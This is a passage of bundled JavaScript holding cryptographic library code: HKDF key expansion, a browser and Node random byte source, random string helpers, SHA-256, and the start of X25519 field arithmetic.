        var ctr = this._counter[0];
        // Check if counter overflowed.
        if (ctr === 0) throw new Error("hkdf: cannot expand more");
        // Prepare HMAC instance for new data with old key.
        this._hmac.reset();
        // Hash in previous output if it was generated
        // (i.e. counter is greater than 1).
        if (ctr > 1) this._hmac.update(this._buffer);
        // Hash in info if it exists.
        if (this._info) this._hmac.update(this._info);
        // Hash in the counter.
        this._hmac.update(this._counter);
        // Output result to buffer and clean HMAC instance.
        this._hmac.finish(this._buffer);
        // Reset buffer position.
        this._bufpos = 0;
    };
    /**
     * Expand returns next key material of the given length.
     *
     * It throws if expansion limit is reached (which is
     * 254 digests of the underlying HMAC function).
     */ HKDF.prototype.expand = function(length) {
        var out = new Uint8Array(length);
        for(var i = 0; i < out.length; i++){
            if (this._bufpos === this._buffer.length) this._fillBuffer();
            out[i] = this._buffer[this._bufpos++];
        }
        return out;
    };
    HKDF.prototype.clean = function() {
        this._hmac.clean();
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._counter);
        this._bufpos = 0;
    };
    return HKDF;
}();
$eea881cb204cba82$exports.HKDF = $eea881cb204cba82$var$HKDF; // TODO(dchest): maybe implement deriveKey?


var $73945d82524e104e$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($73945d82524e104e$exports, "__esModule", {
    value: true
});
$73945d82524e104e$exports.randomStringForEntropy = $73945d82524e104e$exports.randomString = $73945d82524e104e$exports.randomUint32 = $73945d82524e104e$exports.randomBytes = $73945d82524e104e$exports.defaultRandomSource = void 0;
var $470144fd408ed875$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($470144fd408ed875$exports, "__esModule", {
    value: true
});
$470144fd408ed875$exports.SystemRandomSource = void 0;
var $9ffc14634304d8f4$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($9ffc14634304d8f4$exports, "__esModule", {
    value: true
});
$9ffc14634304d8f4$exports.BrowserRandomSource = void 0;
const $9ffc14634304d8f4$var$QUOTA = 65536;
class $9ffc14634304d8f4$var$BrowserRandomSource {
    constructor(){
        this.isAvailable = false;
        this.isInstantiated = false;
        const browserCrypto = typeof self !== "undefined" ? self.crypto || self.msCrypto // IE11 has msCrypto
         : null;
        if (browserCrypto && browserCrypto.getRandomValues !== undefined) {
            this._crypto = browserCrypto;
            this.isAvailable = true;
            this.isInstantiated = true;
        }
    }
    randomBytes(length) {
        if (!this.isAvailable || !this._crypto) throw new Error("Browser random byte generator is not available.");
        const out = new Uint8Array(length);
        for(let i = 0; i < out.length; i += $9ffc14634304d8f4$var$QUOTA)this._crypto.getRandomValues(out.subarray(i, i + Math.min(out.length - i, $9ffc14634304d8f4$var$QUOTA)));
        return out;
    }
}
$9ffc14634304d8f4$exports.BrowserRandomSource = $9ffc14634304d8f4$var$BrowserRandomSource;


var $d0085be48b1f2335$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($d0085be48b1f2335$exports, "__esModule", {
    value: true
});
$d0085be48b1f2335$exports.NodeRandomSource = void 0;


class $d0085be48b1f2335$var$NodeRandomSource {
    constructor(){
        this.isAvailable = false;
        this.isInstantiated = false;
        {
            const nodeCrypto = (parcelRequire("kjyEk"));
            if (nodeCrypto && nodeCrypto.randomBytes) {
                this._crypto = nodeCrypto;
                this.isAvailable = true;
                this.isInstantiated = true;
            }
        }
    }
    randomBytes(length) {
        if (!this.isAvailable || !this._crypto) throw new Error("Node.js random byte generator is not available.");
        // Get random bytes (result is Buffer).
        let buffer = this._crypto.randomBytes(length);
        // Make sure we got the length that we requested.
        if (buffer.length !== length) throw new Error("NodeRandomSource: got fewer bytes than requested");
        // Allocate output array.
        const out = new Uint8Array(length);
        // Copy bytes from buffer to output.
        for(let i = 0; i < out.length; i++)out[i] = buffer[i];
        // Cleanup.
        (0, $276678191c4bdb56$exports.wipe)(buffer);
        return out;
    }
}
$d0085be48b1f2335$exports.NodeRandomSource = $d0085be48b1f2335$var$NodeRandomSource;


class $470144fd408ed875$var$SystemRandomSource {
    constructor(){
        this.isAvailable = false;
        this.name = "";
        // Try browser.
        this._source = new $9ffc14634304d8f4$exports.BrowserRandomSource();
        if (this._source.isAvailable) {
            this.isAvailable = true;
            this.name = "Browser";
            return;
        }
        // If no browser source, try Node.
        this._source = new $d0085be48b1f2335$exports.NodeRandomSource();
        if (this._source.isAvailable) {
            this.isAvailable = true;
            this.name = "Node";
            return;
        }
    // No sources, we're out of options.
    }
    randomBytes(length) {
        if (!this.isAvailable) throw new Error("System random byte generator is not available.");
        return this._source.randomBytes(length);
    }
}
$470144fd408ed875$exports.SystemRandomSource = $470144fd408ed875$var$SystemRandomSource;




$73945d82524e104e$exports.defaultRandomSource = new $470144fd408ed875$exports.SystemRandomSource();
function $73945d82524e104e$var$randomBytes(length, prng = $73945d82524e104e$exports.defaultRandomSource) {
    return prng.randomBytes(length);
}
$73945d82524e104e$exports.randomBytes = $73945d82524e104e$var$randomBytes;
/**
 * Returns a uniformly random unsigned 32-bit integer.
 */ function $73945d82524e104e$var$randomUint32(prng = $73945d82524e104e$exports.defaultRandomSource) {
    // Generate 4-byte random buffer.
    const buf = $73945d82524e104e$var$randomBytes(4, prng);
    // Convert bytes from buffer into a 32-bit integer.
    // It's not important which byte order to use, since
    // the result is random.
    const result = (0, $ddd89ca0ca71c6d3$exports.readUint32LE)(buf);
    // Clean the buffer.
    (0, $276678191c4bdb56$exports.wipe)(buf);
    return result;
}
$73945d82524e104e$exports.randomUint32 = $73945d82524e104e$var$randomUint32;
/** 62 alphanumeric characters for default charset of randomString() */ const $73945d82524e104e$var$ALPHANUMERIC = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/**
 * Returns a uniform random string of the given length
 * with characters from the given charset.
 *
 * Charset must not have more than 256 characters.
 *
 * Default charset generates case-sensitive alphanumeric
 * strings (0-9, A-Z, a-z).
 */ function $73945d82524e104e$var$randomString(length, charset = $73945d82524e104e$var$ALPHANUMERIC, prng = $73945d82524e104e$exports.defaultRandomSource) {
    if (charset.length < 2) throw new Error("randomString charset is too short");
    if (charset.length > 256) throw new Error("randomString charset is too long");
    let out = "";
    const charsLen = charset.length;
    const maxByte = 256 - 256 % charsLen;
    while(length > 0){
        const buf = $73945d82524e104e$var$randomBytes(Math.ceil(length * 256 / maxByte), prng);
        for(let i = 0; i < buf.length && length > 0; i++){
            const randomByte = buf[i];
            if (randomByte < maxByte) {
                out += charset.charAt(randomByte % charsLen);
                length--;
            }
        }
        (0, $276678191c4bdb56$exports.wipe)(buf);
    }
    return out;
}
$73945d82524e104e$exports.randomString = $73945d82524e104e$var$randomString;
/**
 * Returns uniform random string containing at least the given
 * number of bits of entropy.
 *
 * For example, randomStringForEntropy(128) will return a 22-character
 * alphanumeric string, while randomStringForEntropy(128, "0123456789")
 * will return a 39-character numeric string, both will contain at
 * least 128 bits of entropy.
 *
 * Default charset generates case-sensitive alphanumeric
 * strings (0-9, A-Z, a-z).
 */ function $73945d82524e104e$var$randomStringForEntropy(bits, charset = $73945d82524e104e$var$ALPHANUMERIC, prng = $73945d82524e104e$exports.defaultRandomSource) {
    const length = Math.ceil(bits / (Math.log(charset.length) / Math.LN2));
    return $73945d82524e104e$var$randomString(length, charset, prng);
}
$73945d82524e104e$exports.randomStringForEntropy = $73945d82524e104e$var$randomStringForEntropy;


var $66651f7624f8a7c0$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($66651f7624f8a7c0$exports, "__esModule", {
    value: true
});


$66651f7624f8a7c0$exports.DIGEST_LENGTH = 32;
$66651f7624f8a7c0$exports.BLOCK_SIZE = 64;
/**
 * SHA2-256 cryptographic hash algorithm.
 */ var $66651f7624f8a7c0$var$SHA256 = /** @class */ function() {
    function SHA256() {
        /** Length of hash output */ this.digestLength = $66651f7624f8a7c0$exports.DIGEST_LENGTH;
        /** Block size */ this.blockSize = $66651f7624f8a7c0$exports.BLOCK_SIZE;
        // Note: Int32Array is used instead of Uint32Array for performance reasons.
        this._state = new Int32Array(8); // hash state
        this._temp = new Int32Array(64); // temporary state
        this._buffer = new Uint8Array(128); // buffer for data to hash
        this._bufferLength = 0; // number of bytes in buffer
        this._bytesHashed = 0; // number of total bytes hashed
        this._finished = false; // indicates whether the hash was finalized
        this.reset();
    }
    SHA256.prototype._initState = function() {
        this._state[0] = 0x6a09e667;
        this._state[1] = 0xbb67ae85;
        this._state[2] = 0x3c6ef372;
        this._state[3] = 0xa54ff53a;
        this._state[4] = 0x510e527f;
        this._state[5] = 0x9b05688c;
        this._state[6] = 0x1f83d9ab;
        this._state[7] = 0x5be0cd19;
    };
    /**
     * Resets hash state making it possible
     * to re-use this instance to hash other data.
     */ SHA256.prototype.reset = function() {
        this._initState();
        this._bufferLength = 0;
        this._bytesHashed = 0;
        this._finished = false;
        return this;
    };
    /**
     * Cleans internal buffers and resets hash state.
     */ SHA256.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._temp);
        this.reset();
    };
    /**
     * Updates hash state with the given data.
     *
     * Throws error when trying to update already finalized hash:
     * instance must be reset to update it again.
     */ SHA256.prototype.update = function(data, dataLength) {
        if (dataLength === void 0) dataLength = data.length;
        if (this._finished) throw new Error("SHA256: can't update because hash was finished.");
        var dataPos = 0;
        this._bytesHashed += dataLength;
        if (this._bufferLength > 0) {
            while(this._bufferLength < this.blockSize && dataLength > 0){
                this._buffer[this._bufferLength++] = data[dataPos++];
                dataLength--;
            }
            if (this._bufferLength === this.blockSize) {
                $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, this._buffer, 0, this.blockSize);
                this._bufferLength = 0;
            }
        }
        if (dataLength >= this.blockSize) {
            dataPos = $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, data, dataPos, dataLength);
            dataLength %= this.blockSize;
        }
        while(dataLength > 0){
            this._buffer[this._bufferLength++] = data[dataPos++];
            dataLength--;
        }
        return this;
    };
    /**
     * Finalizes hash state and puts hash into out.
     * If hash was already finalized, puts the same value.
     */ SHA256.prototype.finish = function(out) {
        if (!this._finished) {
            var bytesHashed = this._bytesHashed;
            var left = this._bufferLength;
            var bitLenHi = bytesHashed / 0x20000000 | 0;
            var bitLenLo = bytesHashed << 3;
            var padLength = bytesHashed % 64 < 56 ? 64 : 128;
            this._buffer[left] = 0x80;
            for(var i = left + 1; i < padLength - 8; i++)this._buffer[i] = 0;
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenHi, this._buffer, padLength - 8);
            $ddd89ca0ca71c6d3$exports.writeUint32BE(bitLenLo, this._buffer, padLength - 4);
            $66651f7624f8a7c0$var$hashBlocks(this._temp, this._state, this._buffer, 0, padLength);
            this._finished = true;
        }
        for(var i = 0; i < this.digestLength / 4; i++)$ddd89ca0ca71c6d3$exports.writeUint32BE(this._state[i], out, i * 4);
        return this;
    };
    /**
     * Returns the final hash digest.
     */ SHA256.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization.
     * Returns hash state to be used with restoreState().
     * Only chain value is saved, not buffers or other
     * state variables.
     */ SHA256.prototype.saveState = function() {
        if (this._finished) throw new Error("SHA256: cannot save finished state");
        return {
            state: new Int32Array(this._state),
            buffer: this._bufferLength > 0 ? new Uint8Array(this._buffer) : undefined,
            bufferLength: this._bufferLength,
            bytesHashed: this._bytesHashed
        };
    };
    /**
     * Function useful for HMAC/PBKDF2 optimization.
     * Restores state saved by saveState() and sets bytesHashed
     * to the given value.
     */ SHA256.prototype.restoreState = function(savedState) {
        this._state.set(savedState.state);
        this._bufferLength = savedState.bufferLength;
        if (savedState.buffer) this._buffer.set(savedState.buffer);
        this._bytesHashed = savedState.bytesHashed;
        this._finished = false;
        return this;
    };
    /**
     * Cleans state returned by saveState().
     */ SHA256.prototype.cleanSavedState = function(savedState) {
        $276678191c4bdb56$exports.wipe(savedState.state);
        if (savedState.buffer) $276678191c4bdb56$exports.wipe(savedState.buffer);
        savedState.bufferLength = 0;
        savedState.bytesHashed = 0;
    };
    return SHA256;
}();
$66651f7624f8a7c0$exports.SHA256 = $66651f7624f8a7c0$var$SHA256;
// Constants
var $66651f7624f8a7c0$var$K = new Int32Array([
    0x428a2f98,
    0x71374491,
    0xb5c0fbcf,
    0xe9b5dba5,
    0x3956c25b,
    0x59f111f1,
    0x923f82a4,
    0xab1c5ed5,
    0xd807aa98,
    0x12835b01,
    0x243185be,
    0x550c7dc3,
    0x72be5d74,
    0x80deb1fe,
    0x9bdc06a7,
    0xc19bf174,
    0xe49b69c1,
    0xefbe4786,
    0x0fc19dc6,
    0x240ca1cc,
    0x2de92c6f,
    0x4a7484aa,
    0x5cb0a9dc,
    0x76f988da,
    0x983e5152,
    0xa831c66d,
    0xb00327c8,
    0xbf597fc7,
    0xc6e00bf3,
    0xd5a79147,
    0x06ca6351,
    0x14292967,
    0x27b70a85,
    0x2e1b2138,
    0x4d2c6dfc,
    0x53380d13,
    0x650a7354,
    0x766a0abb,
    0x81c2c92e,
    0x92722c85,
    0xa2bfe8a1,
    0xa81a664b,
    0xc24b8b70,
    0xc76c51a3,
    0xd192e819,
    0xd6990624,
    0xf40e3585,
    0x106aa070,
    0x19a4c116,
    0x1e376c08,
    0x2748774c,
    0x34b0bcb5,
    0x391c0cb3,
    0x4ed8aa4a,
    0x5b9cca4f,
    0x682e6ff3,
    0x748f82ee,
    0x78a5636f,
    0x84c87814,
    0x8cc70208,
    0x90befffa,
    0xa4506ceb,
    0xbef9a3f7,
    0xc67178f2
]);
function $66651f7624f8a7c0$var$hashBlocks(w, v, p, pos, len) {
    while(len >= 64){
        var a = v[0];
        var b = v[1];
        var c = v[2];
        var d = v[3];
        var e = v[4];
        var f = v[5];
        var g = v[6];
        var h = v[7];
        for(var i = 0; i < 16; i++){
            var j = pos + i * 4;
            w[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(p, j);
        }
        for(var i = 16; i < 64; i++){
            var u = w[i - 2];
            var t1 = (u >>> 17 | u << 15) ^ (u >>> 19 | u << 13) ^ u >>> 10;
            u = w[i - 15];
            var t2 = (u >>> 7 | u << 25) ^ (u >>> 18 | u << 14) ^ u >>> 3;
            w[i] = (t1 + w[i - 7] | 0) + (t2 + w[i - 16] | 0);
        }
        for(var i = 0; i < 64; i++){
            var t1 = (((e >>> 6 | e << 26) ^ (e >>> 11 | e << 21) ^ (e >>> 25 | e << 7)) + (e & f ^ ~e & g) | 0) + (h + ($66651f7624f8a7c0$var$K[i] + w[i] | 0) | 0) | 0;
            var t2 = ((a >>> 2 | a << 30) ^ (a >>> 13 | a << 19) ^ (a >>> 22 | a << 10)) + (a & b ^ a & c ^ b & c) | 0;
            h = g;
            g = f;
            f = e;
            e = d + t1 | 0;
            d = c;
            c = b;
            b = a;
            a = t1 + t2 | 0;
        }
        v[0] += a;
        v[1] += b;
        v[2] += c;
        v[3] += d;
        v[4] += e;
        v[5] += f;
        v[6] += g;
        v[7] += h;
        pos += 64;
        len -= 64;
    }
    return pos;
}
function $66651f7624f8a7c0$var$hash(data) {
    var h = new $66651f7624f8a7c0$var$SHA256();
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$66651f7624f8a7c0$exports.hash = $66651f7624f8a7c0$var$hash;


var $569072827d3d60aa$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($569072827d3d60aa$exports, "__esModule", {
    value: true
});
$569072827d3d60aa$exports.sharedKey = $569072827d3d60aa$exports.generateKeyPair = $569072827d3d60aa$exports.generateKeyPairFromSeed = $569072827d3d60aa$exports.scalarMultBase = $569072827d3d60aa$exports.scalarMult = $569072827d3d60aa$exports.SHARED_KEY_LENGTH = $569072827d3d60aa$exports.SECRET_KEY_LENGTH = $569072827d3d60aa$exports.PUBLIC_KEY_LENGTH = void 0;


$569072827d3d60aa$exports.PUBLIC_KEY_LENGTH = 32;
$569072827d3d60aa$exports.SECRET_KEY_LENGTH = 32;
$569072827d3d60aa$exports.SHARED_KEY_LENGTH = 32;
// Returns new zero-filled 16-element GF (Float64Array).
// If passed an array of numbers, prefills the returned
// array with them.
//
// We use Float64Array, because we need 48-bit numbers
// for this implementation.
function $569072827d3d60aa$var$gf(init) {
    const r = new Float64Array(16);
    if (init) for(let i = 0; i < init.length; i++)r[i] = init[i];
    return r;
}
// Base point.
const $569072827d3d60aa$var$_9 = new Uint8Array(32);
$569072827d3d60aa$var$_9[0] = 9;
const $569072827d3d60aa$var$_121665 = $569072827d3d60aa$var$gf([
    0xdb41,
    1
]);
function $569072827d3d60aa$var$car25519(o) {
    let c = 1;
    for(let i = 0; i < 16; i++){
        let v = o[i] + c + 65535;
        c = Math.floor(v / 65536);
        o[i] = v - c * 65536;
    }
    o[0] += c - 1 + 37 * (c - 1);
}
function $569072827d3d60aa$var$sel25519(p, q, b) {
    const c = ~(b - 1);
    for(let i = 0; i < 16; i++){
        const t = c & (p[i] ^ q[i]);
        p[i] ^= t;
        q[i] ^= t;
    }
}
function $569072827d3d60aa$var$pack25519(o, n) {
    const m = $569072827d3d60aa$var$gf();
    const t = $569072827d3d60aa$var$gf();
    for(let i = 0; i < 16; i++)t[i] = n[i];
    $569072827d3d60aa$var$car25519(t);
    $569072827d3d60aa$var$car25519(t);
    $569072827d3d60aa$var$car25519(t);
    for(let j = 0; j < 2; j++){
        m[0] = t[0] - 0xffed;
        for(let i = 1; i < 15; i++){
            m[i] = t[i] - 0xffff - (m[i - 1] >> 16 & 1);
            m[i - 1] &= 0xffff;
        }
        m[15] = t[15] - 0x7fff - (m[14] >> 16 & 1);
        const b = m[15] >> 16 & 1;
        m[14] &= 0xffff;
        $569072827d3d60aa$var$sel25519(t, m, 1 - b);
    }
    for(let i = 0; i < 16; i++){
        o[2 * i] = t[i] & 0xff;
        o[2 * i + 1] = t[i] >> 8;
    }
}
function $569072827d3d60aa$var$unpack25519(o, n) {
    for(let i = 0; i < 16; i++)o[i] = n[2 * i] + (n[2 * i + 1] << 8);
    o[15] &= 0x7fff;
}
function $569072827d3d60aa$var$add(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] + b[i];
}
function $569072827d3d60aa$var$sub(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] - b[i];
}
function $569072827d3d60aa$var$mul(o, a, b) {
    let v, c, t0 = 0, t1 = 0, t2 = 0, t3 = 0, t4 = 0, t5 = 0, t6 = 0, t7 = 0, t8 = 0, t9 = 0, t10 = 0, t11 = 0, t12 = 0, t13 = 0, t14 = 0, t15 = 0, t16 = 0, t17 = 0, t18 = 0, t19 = 0, t20 = 0, t21 = 0, t22 = 0, t23 = 0, t24 = 0, t25 = 0, t26 = 0, t27 = 0, t28 = 0, t29 = 0, t30 = 0, b0 = b[0], b1 = b[1], b2 = b[2], b3 = b[3], b4 = b[4], b5 = b[5], b6 = b[6], b7 = b[7], b8 = b[8], b9 = b[9], b10 = b[10], b11 = b[11], b12 = b[12], b13 = b[13], b14 = b[14], b15 = b[15];
    v = a[0];
    t0 += v * b0;
    t1 += v * b1;
    t2 += v * b2;
    t3 += v * b3;
    t4 += v * b4;
    t5 += v * b5;
    t6 += v * b6;
    t7 += v * b7;
    t8 += v * b8;
    t9 += v * b9;
    t10 += v * b10;
    t11 += v * b11;
    t12 += v * b12;
    t13 += v * b13;
    t14 += v * b14;
    t15 += v * b15;
    v = a[1];
    t1 += v * b0;
    t2 += v * b1;
    t3 += v * b2;
    t4 += v * b3;
    t5 += v * b4;
    t6 += v * b5;
    t7 += v * b6;
    t8 += v * b7;
    t9 += v * b8;
    t10 += v * b9;
    t11 += v * b10;
    t12 += v * b11;
    t13 += v * b12;
    t14 += v * b13;
    t15 += v * b14;
    t16 += v * b15;
    v = a[2];
    t2 += v * b0;
    t3 += v * b1;
    t4 += v * b2;
    t5 += v * b3;
    t6 += v * b4;
    t7 += v * b5;
    t8 += v * b6;
    t9 += v * b7;
    t10 += v * b8;
    t11 += v * b9;
    t12 += v * b10;
    t13 += v * b11;
    t14 += v * b12;
    t15 += v * b13;
    t16 += v * b14;
    t17 += v * b15;
    v = a[3];
    t3 += v * b0;
    t4 += v * b1;
    t5 += v * b2;
    t6 += v * b3;
    t7 += v * b4;
    t8 += v * b5;
    t9 += v * b6;
    t10 += v * b7;
    t11 += v * b8;
    t12 += v * b9;
    t13 += v * b10;
    t14 += v * b11;
    t15 += v * b12;
    t16 += v * b13;
    t17 += v * b14;
    t18 += v * b15;
    v = a[4];
    t4 += v * b0;
    t5 += v * b1;
    t6 += v * b2;
    t7 += v * b3;
    t8 += v * b4;
    t9 += v * b5;
    t10 += v * b6;
    t11 += v * b7;
    t12 += v * b8;
    t13 += v * b9;
    t14 += v * b10;
    t15 += v * b11;
    t16 += v * b12;
    t17 += v * b13;
    t18 += v * b14;
    t19 += v * b15;
    v = a[5];
    t5 += v * b0;
    t6 += v * b1;
    t7 += v * b2;
    t8 += v * b3;
    t9 += v * b4;
    t10 += v * b5;
    t11 += v * b6;
    t12 += v * b7;
    t13 += v * b8;
    t14 += v * b9;
    t15 += v * b10;
    t16 += v * b11;
    t17 += v * b12;
    t18 += v * b13;
    t19 += v * b14;
    t20 += v * b15;
    v = a[6];
    t6 += v * b0;
    t7 += v * b1;
    t8 += v * b2;
    t9 += v * b3;
    t10 += v * b4;
    t11 += v * b5;
    t12 += v * b6;
    t13 += v * b7;
    t14 += v * b8;
    t15 += v * b9;
    t16 += v * b10;
    t17 += v * b11;
    t18 += v * b12;
    t19 += v * b13;
    t20 += v * b14;
    t21 += v * b15;
    v = a[7];
    t7 += v * b0;
    t8 += v * b1;
    t9 += v * b2;
    t10 += v * b3;
    t11 += v * b4;
    t12 += v * b5;
    t13 += v * b6;
    t14 += v * b7;
    t15 += v * b8;
    t16 += v * b9;
    t17 += v * b10;
    t18 += v * b11;
    t19 += v * b12;
    t20 += v * b13;
    t21 += v * b14;
    t22 += v * b15;
    v = a[8];
    t8 += v * b0;
    t9 += v * b1;
    t10 += v * b2;
    t11 += v * b3;
    t12 += v * b4;
    t13 += v * b5;
    t14 += v * b6;
    t15 += v * b7;
    t16 += v * b8;
    t17 += v * b9;
    t18 += v * b10;
    t19 += v * b11;
    t20 += v * b12;
    t21 += v * b13;
    t22 += v * b14;
    t23 += v * b15;
    v = a[9];
    t9 += v * b0;
    t10 += v * b1;
    t11 += v * b2;
    t12 += v * b3;
    t13 += v * b4;
    t14 += v * b5;
    t15 += v * b6;
    t16 += v * b7;
    t17 += v * b8;
    t18 += v * b9;
    t19 += v * b10;
    t20 += v * b11;
    t21 += v * b12;
    t22 += v * b13;
    t23 += v * b14;
    t24 += v * b15;
    v = a[10];
    t10 += v * b0;
    t11 += v * b1;
    t12 += v * b2;
    t13 += v * b3;
    t14 += v * b4;
    t15 += v * b5;
    t16 += v * b6;
    t17 += v * b7;
    t18 += v * b8;
    t19 += v * b9;
    t20 += v * b10;
    t21 += v * b11;
    t22 += v * b12;
    t23 += v * b13;
    t24 += v * b14;
    t25 += v * b15;
    v = a[11];
    t11 += v * b0;
    t12 += v * b1;
    t13 += v * b2;
    t14 += v * b3;
    t15 += v * b4;
    t16 += v * b5;
    t17 += v * b6;
    t18 += v * b7;
    t19 += v * b8;
    t20 += v * b9;
    t21 += v * b10;
    t22 += v * b11;
    t23 += v * b12;
    t24 += v * b13;
    t25 += v * b14;
    t26 += v * b15;
    v = a[12];
    t12 += v * b0;
    t13 += v * b1;
    t14 += v * b2;
    t15 += v * b3;
    t16 += v * b4;
    t17 += v * b5;
    t18 += v * b6;
    t19 += v * b7;
    t20 += v * b8;
    t21 += v * b9;
    t22 += v * b10;
    t23 += v * b11;
    t24 += v * b12;
    t25 += v * b13;
    t26 += v * b14;
    t27 += v * b15;
    v = a[13];
    t13 += v * b0;
    t14 += v * b1;
    t15 += v * b2;
    t16 += v * b3;
    t17 += v * b4;
    t18 += v * b5;
    t19 += v * b6;
    t20 += v * b7;
    t21 += v * b8;
    t22 += v * b9;
    t23 += v * b10;
    t24 += v * b11;
    t25 += v * b12;
    t26 += v * b13;
    t27 += v * b14;
    t28 += v * b15;
    v = a[14];
    t14 += v * b0;
    t15 += v * b1;
    t16 += v * b2;
    t17 += v * b3;
    t18 += v * b4;
    t19 += v * b5;
    t20 += v * b6;
    t21 += v * b7;
    t22 += v * b8;
    t23 += v * b9;
    t24 += v * b10;
    t25 += v * b11;
    t26 += v * b12;
    t27 += v * b13;
    t28 += v * b14;
    t29 += v * b15;
    v = a[15];
    t15 += v * b0;
    t16 += v * b1;
    t17 += v * b2;
    t18 += v * b3;
    t19 += v * b4;
    t20 += v * b5;
    t21 += v * b6;
    t22 += v * b7;
    t23 += v * b8;
    t24 += v * b9;
    t25 += v * b10;
    t26 += v * b11;
    t27 += v * b12;
    t28 += v * b13;
    t29 += v * b14;
    t30 += v * b15;
    t0 += 38 * t16;
    t1 += 38 * t17;
    t2 += 38 * t18;
    t3 += 38 * t19;
    t4 += 38 * t20;
    t5 += 38 * t21;
    t6 += 38 * t22;
    t7 += 38 * t23;
    t8 += 38 * t24;
    t9 += 38 * t25;
    t10 += 38 * t26;
    t11 += 38 * t27;
    t12 += 38 * t28;
    t13 += 38 * t29;
    t14 += 38 * t30;
    // t15 left as is
    // first car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    // second car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    o[0] = t0;
    o[1] = t1;
    o[2] = t2;
    o[3] = t3;
    o[4] = t4;
    o[5] = t5;
    o[6] = t6;
    o[7] = t7;
    o[8] = t8;
    o[9] = t9;
    o[10] = t10;
    o[11] = t11;
    o[12] = t12;
    o[13] = t13;
    o[14] = t14;
    o[15] = t15;
}
function $569072827d3d60aa$var$square(o, a) {
    $569072827d3d60aa$var$mul(o, a, a);
}
function $569072827d3d60aa$var$inv25519(o, inp) {
    const c = $569072827d3d60aa$var$gf();
    for(let i = 0; i < 16; i++)c[i] = inp[i];
    for(let i = 253; i >= 0; i--){
        $569072827d3d60aa$var$square(c, c);
        if (i !== 2 && i !== 4) $569072827d3d60aa$var$mul(c, c, inp);
    }
    for(let i = 0; i < 16; i++)o[i] = c[i];
}
function $569072827d3d60aa$var$scalarMult(n, p) {
    const z = new Uint8Array(32);
    const x = new Float64Array(80);
    const a = $569072827d3d60aa$var$gf(), b = $569072827d3d60aa$var$gf(), c = $569072827d3d60aa$var$gf(), d = $569072827d3d60aa$var$gf(), e = $569072827d3d60aa$var$gf(), f = $569072827d3d60aa$var$gf();
